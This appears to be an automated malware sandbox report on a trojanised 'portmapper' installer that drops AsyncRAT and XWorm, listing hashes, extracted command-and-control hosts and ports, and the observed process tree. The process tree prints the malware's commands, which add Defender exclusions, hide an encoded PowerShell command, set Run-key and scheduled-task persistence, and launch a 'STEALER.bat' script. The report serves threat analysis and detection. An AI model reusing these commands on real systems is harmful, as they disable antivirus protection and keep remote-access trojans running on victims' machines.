Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
10Static
static
3DUCSetup_v4_1_1.exe
windows7-x64
7DUCSetup_v4_1_1.exe
windows10-2004-x64
7$PLUGINSDI...er.dll
windows7-x64
3$PLUGINSDI...er.dll
windows10-2004-x64
3$PLUGINSDI...dl.dll
windows7-x64
3$PLUGINSDI...dl.dll
windows10-2004-x64
3$PLUGINSDI...em.dll
windows7-x64
3$PLUGINSDI...em.dll
windows10-2004-x64
3$PLUGINSDI...gs.dll
windows7-x64
3$PLUGINSDI...gs.dll
windows10-2004-x64
3$PLUGINSDI...ec.dll
windows7-x64
3$PLUGINSDI...ec.dll
windows10-2004-x64
3DUC40.exe
windows7-x64
3DUC40.exe
windows10-2004-x64
3ducapi.dll
windows7-x64
1ducapi.dll
windows10-2004-x64
1portmapper-2.2.3.exe
windows7-x64
10portmapper-2.2.3.exe
windows10-2004-x64
10Analysis
-
max time kernel
149s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
13/09/2024, 19:20
Static task
static1
Behavioral task
behavioral1
Sample
DUCSetup_v4_1_1.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
DUCSetup_v4_1_1.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/Banner.dll
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/Banner.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
$PLUGINSDIR/NSISdl.dll
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
$PLUGINSDIR/NSISdl.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
$PLUGINSDIR/System.dll
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
$PLUGINSDIR/System.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral9
Sample
$PLUGINSDIR/nsDialogs.dll
Resource
win7-20240704-en
Behavioral task
behavioral10
Sample
$PLUGINSDIR/nsDialogs.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral11
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral13
Sample
DUC40.exe
Resource
win7-20240729-en
Behavioral task
behavioral14
Sample
DUC40.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral15
Sample
ducapi.dll
Resource
win7-20240903-en
Behavioral task
behavioral16
Sample
ducapi.dll
Resource
win10v2004-20240802-en
General
-
Target
portmapper-2.2.3.exe
-
Size
5.2MB
-
MD5
9f14a0573f96ce3c3374044e585f7eb0
-
SHA1
88247dac3c2a4e5a760c215436a99afe9ad5577f
-
SHA256
e5f62be708a0caa8b4e5dfcf07127eabc49a8a61a300f434367718b7e7c2e7e3
-
SHA512
f1e5af30c5c251a294998eb15cef22d22c6e30c900e08d86721ad3bfe400b86b8866c8ec66082014f3f3da2fb576a4cf35f1ff9e1f36d1dad26403fa96f9f91b
-
SSDEEP
98304:rqw3fQlyOEaEyr9QsYhzAkSuwnu0J74Ijb4eDaJo99AXvhdkfx5:rqw3fsVPYa7J7zjxae7iZdK
Malware Config
Extracted
asyncrat
L838 RAT v1.0.0
Default
127.0.0.1:54984
l838.ddns.net:54984
kswxiqghhjgkjqpqzz
-
delay
3
-
install
true
-
install_file
Windows Service Wrapper.exe
-
install_folder
%programdata%
Extracted
xworm
127.0.0.1:3232
l838.ddns.net:3232
0x365c3e6EeF15a2938FC7267D5A3386c8e23aBc5F:123
-
Install_directory
%ProgramData%
-
install_file
Windows Security Wrapper.exe
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral18/files/0x00090000000234da-15.dat family_xworm behavioral18/memory/3660-72-0x0000000000DA0000-0x0000000000DB8000-memory.dmp family_xworm -
Async RAT payload 1 IoCs
resource yara_rule behavioral18/files/0x000b0000000234e7-43.dat family_asyncrat -
pid Process 5020 powershell.exe 4428 powershell.exe 2980 powershell.exe 2832 powershell.exe 1164 powershell.exe 228 powershell.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation portmapper-2.2.3.exe Key value queried \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation PortServices.exe Key value queried \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation WindowsSmartScreen.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Security Wrapper.lnk WindowsSmartScreen.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Security Wrapper.lnk WindowsSmartScreen.exe -
Executes dropped EXE 6 IoCs
pid Process 4228 PortServices.exe 3660 WindowsSmartScreen.exe 5100 WindowsDriverFoundation.exe 3840 trellrt.exe 4944 Windows Security Wrapper.exe 2852 Windows Security Wrapper.exe -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Security Wrapper = "C:\\ProgramData\\Windows Security Wrapper.exe" WindowsSmartScreen.exe Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemUpdateWindowsSmartScreen = "C:\\Users\\Admin\\WindowsSmartScreen.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemUpdateWindowsDriverFoundation = "C:\\Users\\Admin\\WindowsDriverFoundation.exe" reg.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA trellrt.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 14 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 13 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language trellrt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PortServices.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language find.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language find.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings portmapper-2.2.3.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4536 schtasks.exe 860 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3660 WindowsSmartScreen.exe -
Suspicious behavior: EnumeratesProcesses 25 IoCs
pid Process 4644 powershell.exe 5020 powershell.exe 5020 powershell.exe 4644 powershell.exe 3840 trellrt.exe 3840 trellrt.exe 3840 trellrt.exe 4428 powershell.exe 4428 powershell.exe 4428 powershell.exe 2980 powershell.exe 2980 powershell.exe 2980 powershell.exe 2832 powershell.exe 2832 powershell.exe 2832 powershell.exe 1164 powershell.exe 1164 powershell.exe 1164 powershell.exe 228 powershell.exe 228 powershell.exe 228 powershell.exe 3840 trellrt.exe 3840 trellrt.exe 3840 trellrt.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3840 trellrt.exe -
Suspicious use of AdjustPrivilegeToken 55 IoCs
description pid Process Token: SeDebugPrivilege 3660 WindowsSmartScreen.exe Token: SeDebugPrivilege 5100 WindowsDriverFoundation.exe Token: SeDebugPrivilege 5020 powershell.exe Token: SeDebugPrivilege 4644 powershell.exe Token: SeDebugPrivilege 3840 trellrt.exe Token: SeIncreaseQuotaPrivilege 5100 WindowsDriverFoundation.exe Token: SeSecurityPrivilege 5100 WindowsDriverFoundation.exe Token: SeTakeOwnershipPrivilege 5100 WindowsDriverFoundation.exe Token: SeLoadDriverPrivilege 5100 WindowsDriverFoundation.exe Token: SeSystemProfilePrivilege 5100 WindowsDriverFoundation.exe Token: SeSystemtimePrivilege 5100 WindowsDriverFoundation.exe Token: SeProfSingleProcessPrivilege 5100 WindowsDriverFoundation.exe Token: SeIncBasePriorityPrivilege 5100 WindowsDriverFoundation.exe Token: SeCreatePagefilePrivilege 5100 WindowsDriverFoundation.exe Token: SeBackupPrivilege 5100 WindowsDriverFoundation.exe Token: SeRestorePrivilege 5100 WindowsDriverFoundation.exe Token: SeShutdownPrivilege 5100 WindowsDriverFoundation.exe Token: SeDebugPrivilege 5100 WindowsDriverFoundation.exe Token: SeSystemEnvironmentPrivilege 5100 WindowsDriverFoundation.exe Token: SeRemoteShutdownPrivilege 5100 WindowsDriverFoundation.exe Token: SeUndockPrivilege 5100 WindowsDriverFoundation.exe Token: SeManageVolumePrivilege 5100 WindowsDriverFoundation.exe Token: 33 5100 WindowsDriverFoundation.exe Token: 34 5100 WindowsDriverFoundation.exe Token: 35 5100 WindowsDriverFoundation.exe Token: 36 5100 WindowsDriverFoundation.exe Token: SeIncreaseQuotaPrivilege 5100 WindowsDriverFoundation.exe Token: SeSecurityPrivilege 5100 WindowsDriverFoundation.exe Token: SeTakeOwnershipPrivilege 5100 WindowsDriverFoundation.exe Token: SeLoadDriverPrivilege 5100 WindowsDriverFoundation.exe Token: SeSystemProfilePrivilege 5100 WindowsDriverFoundation.exe Token: SeSystemtimePrivilege 5100 WindowsDriverFoundation.exe Token: SeProfSingleProcessPrivilege 5100 WindowsDriverFoundation.exe Token: SeIncBasePriorityPrivilege 5100 WindowsDriverFoundation.exe Token: SeCreatePagefilePrivilege 5100 WindowsDriverFoundation.exe Token: SeBackupPrivilege 5100 WindowsDriverFoundation.exe Token: SeRestorePrivilege 5100 WindowsDriverFoundation.exe Token: SeShutdownPrivilege 5100 WindowsDriverFoundation.exe Token: SeDebugPrivilege 5100 WindowsDriverFoundation.exe Token: SeSystemEnvironmentPrivilege 5100 WindowsDriverFoundation.exe Token: SeRemoteShutdownPrivilege 5100 WindowsDriverFoundation.exe Token: SeUndockPrivilege 5100 WindowsDriverFoundation.exe Token: SeManageVolumePrivilege 5100 WindowsDriverFoundation.exe Token: 33 5100 WindowsDriverFoundation.exe Token: 34 5100 WindowsDriverFoundation.exe Token: 35 5100 WindowsDriverFoundation.exe Token: 36 5100 WindowsDriverFoundation.exe Token: SeDebugPrivilege 4428 powershell.exe Token: SeDebugPrivilege 2980 powershell.exe Token: SeDebugPrivilege 2832 powershell.exe Token: SeDebugPrivilege 1164 powershell.exe Token: SeDebugPrivilege 228 powershell.exe Token: SeDebugPrivilege 3660 WindowsSmartScreen.exe Token: SeDebugPrivilege 4944 Windows Security Wrapper.exe Token: SeDebugPrivilege 2852 Windows Security Wrapper.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4228 PortServices.exe -
Suspicious use of WriteProcessMemory 55 IoCs
description pid Process procid_target PID 2300 wrote to memory of 4228 2300 portmapper-2.2.3.exe 84 PID 2300 wrote to memory of 4228 2300 portmapper-2.2.3.exe 84 PID 2300 wrote to memory of 4228 2300 portmapper-2.2.3.exe 84 PID 4228 wrote to memory of 4644 4228 PortServices.exe 86 PID 4228 wrote to memory of 4644 4228 PortServices.exe 86 PID 4228 wrote to memory of 4644 4228 PortServices.exe 86 PID 4228 wrote to memory of 3660 4228 PortServices.exe 88 PID 4228 wrote to memory of 3660 4228 PortServices.exe 88 PID 4228 wrote to memory of 5100 4228 PortServices.exe 89 PID 4228 wrote to memory of 5100 4228 PortServices.exe 89 PID 4228 wrote to memory of 4788 4228 PortServices.exe 90 PID 4228 wrote to memory of 4788 4228 PortServices.exe 90 PID 4228 wrote to memory of 4788 4228 PortServices.exe 90 PID 4228 wrote to memory of 3840 4228 PortServices.exe 91 PID 4228 wrote to memory of 3840 4228 PortServices.exe 91 PID 4228 wrote to memory of 3840 4228 PortServices.exe 91 PID 2300 wrote to memory of 4768 2300 portmapper-2.2.3.exe 93 PID 2300 wrote to memory of 4768 2300 portmapper-2.2.3.exe 93 PID 4788 wrote to memory of 5020 4788 cmd.exe 94 PID 4788 wrote to memory of 5020 4788 cmd.exe 94 PID 4788 wrote to memory of 5020 4788 cmd.exe 94 PID 3840 wrote to memory of 860 3840 trellrt.exe 96 PID 3840 wrote to memory of 860 3840 trellrt.exe 96 PID 3840 wrote to memory of 860 3840 trellrt.exe 96 PID 4788 wrote to memory of 4428 4788 cmd.exe 102 PID 4788 wrote to memory of 4428 4788 cmd.exe 102 PID 4788 wrote to memory of 4428 4788 cmd.exe 102 PID 3660 wrote to memory of 2980 3660 WindowsSmartScreen.exe 103 PID 3660 wrote to memory of 2980 3660 WindowsSmartScreen.exe 103 PID 3660 wrote to memory of 2832 3660 WindowsSmartScreen.exe 105 PID 3660 wrote to memory of 2832 3660 WindowsSmartScreen.exe 105 PID 3660 wrote to memory of 1164 3660 WindowsSmartScreen.exe 107 PID 3660 wrote to memory of 1164 3660 WindowsSmartScreen.exe 107 PID 4788 wrote to memory of 3240 4788 cmd.exe 108 PID 4788 wrote to memory of 3240 4788 cmd.exe 108 PID 4788 wrote to memory of 3240 4788 cmd.exe 108 PID 4788 wrote to memory of 4936 4788 cmd.exe 110 PID 4788 wrote to memory of 4936 4788 cmd.exe 110 PID 4788 wrote to memory of 4936 4788 cmd.exe 110 PID 4788 wrote to memory of 2516 4788 cmd.exe 111 PID 4788 wrote to memory of 2516 4788 cmd.exe 111 PID 4788 wrote to memory of 2516 4788 cmd.exe 111 PID 4788 wrote to memory of 3420 4788 cmd.exe 112 PID 4788 wrote to memory of 3420 4788 cmd.exe 112 PID 4788 wrote to memory of 3420 4788 cmd.exe 112 PID 4788 wrote to memory of 3440 4788 cmd.exe 113 PID 4788 wrote to memory of 3440 4788 cmd.exe 113 PID 4788 wrote to memory of 3440 4788 cmd.exe 113 PID 4788 wrote to memory of 2564 4788 cmd.exe 114 PID 4788 wrote to memory of 2564 4788 cmd.exe 114 PID 4788 wrote to memory of 2564 4788 cmd.exe 114 PID 3660 wrote to memory of 228 3660 WindowsSmartScreen.exe 116 PID 3660 wrote to memory of 228 3660 WindowsSmartScreen.exe 116 PID 3660 wrote to memory of 4536 3660 WindowsSmartScreen.exe 120 PID 3660 wrote to memory of 4536 3660 WindowsSmartScreen.exe 120 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\portmapper-2.2.3.exe"C:\Users\Admin\AppData\Local\Temp\portmapper-2.2.3.exe"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2300 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\PortServices.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\PortServices.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4228 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAegBjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAcQBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAdAB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAYwBoACMAPgA="3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4644
-
-
C:\Users\Admin\WindowsSmartScreen.exe"C:\Users\Admin\WindowsSmartScreen.exe"3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3660 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\WindowsSmartScreen.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2980
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WindowsSmartScreen.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2832
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Windows Security Wrapper.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1164
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Security Wrapper.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:228
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Security Wrapper" /tr "C:\ProgramData\Windows Security Wrapper.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:4536
-
-
-
C:\Users\Admin\WindowsDriverFoundation.exe"C:\Users\Admin\WindowsDriverFoundation.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5100
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\STEALER.bat" "3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4788 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Disabling-WindowsRecoveryEnvironment"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5020
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\WindowsExecutables'"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4428
-
-
C:\Windows\SysWOW64\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"4⤵
- System Location Discovery: System Language Discovery
PID:3240
-
-
C:\Windows\SysWOW64\find.exefind /i "SystemUpdateWindowsSmartScreen"4⤵
- System Location Discovery: System Language Discovery
PID:4936
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SystemUpdateWindowsSmartScreen" /t REG_SZ /d "C:\Users\Admin\WindowsSmartScreen.exe" /f4⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:2516
-
-
C:\Windows\SysWOW64\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"4⤵
- System Location Discovery: System Language Discovery
PID:3420
-
-
C:\Windows\SysWOW64\find.exefind /i "SystemUpdateWindowsDriverFoundation"4⤵
- System Location Discovery: System Language Discovery
PID:3440
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SystemUpdateWindowsDriverFoundation" /t REG_SZ /d "C:\Users\Admin\WindowsDriverFoundation.exe" /f4⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:2564
-
-
-
C:\Users\Admin\AppData\Roaming\trellrt.exe"C:\Users\Admin\AppData\Roaming\trellrt.exe"3⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3840 -
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn "DSL Service" /xml "C:\Users\Admin\AppData\Local\Temp\tmpE38A.tmp"4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:860
-
-
-
-
C:\Program Files\Java\jre-1.8\bin\javaw.exe"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Local\Temp\RarSFX0\portmapper-2.2.3.jar"2⤵PID:4768
-
-
C:\ProgramData\Windows Security Wrapper.exe"C:\ProgramData\Windows Security Wrapper.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4944
-
C:\ProgramData\Windows Security Wrapper.exe"C:\ProgramData\Windows Security Wrapper.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2852
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Modify Registry
1Obfuscated Files or Information
1Command Obfuscation
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
18KB
MD5968d5f3eb5a534806d6b48600b2fb501
SHA10903327719a78aeb0b2a3987916d2f2e29f194d5
SHA25638821e0289791cba6a852307c9d8ef1d6af6c85e80af5a4bbc2163005233450b
SHA5120f4db0b0c0ca29d3a9d6328c559644cb1b5888419ef4020d91c92c23fed8829ac81ab6fa927f33bd1c1a12fab25b1015d4ed5d6216f796072fede73d7da97139
-
Filesize
944B
MD59b80cd7a712469a4c45fec564313d9eb
SHA16125c01bc10d204ca36ad1110afe714678655f2d
SHA2565a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d
SHA512ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584
-
Filesize
944B
MD5e60eb305a7b2d9907488068b7065abd3
SHA11643dd7f915ac50c75bc01c53d68c5dafb9ce28d
SHA256ad07460e061642c0dd4e7dfa7b821aacce873e290389e72f708e9f3504f9d135
SHA51295c45afec6fa4e0b2a21edd10a6b2dc30568810c67bc9bc34d98ab111c48261f377a370583adb27e08616b0108026c119493b1b093b52ce931117e646b46cb7b
-
Filesize
944B
MD536c1937644741dead48c1c090eeea972
SHA1f795939bced5653be2c10e6850ba94c268fb6b42
SHA256c9368ff7aa0e52a8f66081c343bd9e8e7827d9cb0acb25fe05bd4efb01813c68
SHA5127af3c3d12de9f185c5fbdc7519d221f1fa91053056516e1d200561d553a39c22c1e8714b6c38c81a71f1f23e21e51380fb3359f877370a387dfe27aefea764c5
-
Filesize
353KB
MD5565ab186944e5842406ab4f9d74f46f5
SHA1224bd1ca4711683c583945b3d6ecab5e5c639470
SHA256679d4c6a8111b4948639cc03794708f234501e052b2ebe0451a3d8bcbc379328
SHA51214b493887904eedcc55e2acf48196f4299a3e88a458ba75477a96796d644f5b11245f038cc0479d44bf58ea071c6a383a90c494654f775de4810ab2bb8129de8
-
Filesize
5.0MB
MD5df6057d0eeba1ab4266dd271536f1298
SHA18be95aa1a26c4c4328ca6c5a98ba34766f748102
SHA256aa5f3fb51ff107a38aaf07537e79754d94855fbe62f95a8cb702d7eeed928b6e
SHA512f291051434229931681a55afb313f0f595de52c0d176155343c3e05fa73a5378451a203be061265cf696a5f334190a1a8060b513ee6bc9e838efda5b26c06795
-
Filesize
1KB
MD51f69a22a7a1b2d2fd521ce21eb188c8f
SHA1e966e6e359bb9e7b77ed74e77375145e5cd21fdd
SHA25654585cad234b01400a62516b60260366f8bf29fde4aaebd81cb6b1d4bfe0cce7
SHA512905699190d5ee151ce34900920720e955a328a4d5012542529c8e22ccebcf96d0ab18f4b3977e3f1b65a41c52a7f2ede61ceff4eb07a9a66f8bf41ac7002d755
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1KB
MD5c959800473a9762a191d5458383878a6
SHA1b4e211472e313711cd59ada511b0d9ad38ed7ff3
SHA256de79f0647decf1c96baa7c71f984a23f651745a047cc5d979f42824efc3ce701
SHA512239dd7b34a46fd5abb06d81a979b0586e9a129293248df0afdc403e3be22671df0a1d422e5e9270d8fbe5faae415b4fff9fa747aa32ef695177c4ced38688128
-
Filesize
203KB
MD540b631e57ce22a4b52cb382cc44204c9
SHA158f46159e4cd20044d60c2572b91f6d48e9afafd
SHA256338c3e0d6dc067eb96eba389e63f60621bcd5b3573bf0e6fd73dced54fe55d7a
SHA512060d1c6e2a706bf3f375eb50647ba4820ac0c9f2d34838bda5f0303f1ef14e75e83d9167e9f50a19d72bfe4bb55fc28b7e64aa650e379f5dd2077b9e3ebbbdba
-
Filesize
74KB
MD5e40cf402a05b77c43a1934802059a39d
SHA1126f95a2d81c7007214be6933862485292fab294
SHA256edcae846e567107bdc6a741cdda70b82cd2526829899bc16ba4651f68e76a16c
SHA512ded21984cf2d95b9cab4b677f2c58cadd914f3b5b63ecae056bcfd55bfd43c03433dbef73156aaa99c4a1fd47a8e32e0371f49ae5113beca31a47dd8221f1259
-
Filesize
69KB
MD5603b4a00b2f8cb021066710cc002e323
SHA18d8b2f0e16de8c3e40485f608405bce07a31b49b
SHA2565e380cae6f287ef4a209916f2e0f86e1511bec721fe85ddbab2bcb30255ad9a2
SHA5120beefc1647b5e4cdd058c0a0d1e7c739297733f4d4dbf4cf5f2588b2c1c23049376c392150a375df855a27e4c99cf05f2c924427bc457bbe7ca53e58d8958956